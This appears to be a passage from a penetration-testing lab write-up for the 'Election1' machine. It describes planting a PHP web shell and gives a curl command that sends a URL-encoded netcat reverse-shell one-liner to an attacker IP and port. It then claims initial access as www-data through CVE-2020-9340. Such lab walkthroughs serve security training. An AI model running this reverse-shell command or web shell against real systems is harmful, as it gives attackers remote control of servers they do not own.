Web Shell
A PHP web shell has been planted to the /var/www/html/election/shell.php file.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -s "http://$IP/election/shell2.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.45.247%209999%20%3E%2Ftmp%2Ff"Sending a reverse shell
/Play/Election1/3-Exploitation/attachments/{9205EECA-42AC-41F9-B876-FD994C2F56CD}.png)
Initial Foothold established to the election host as the www-data account via webshell planted from exploiting CVE-2020-9340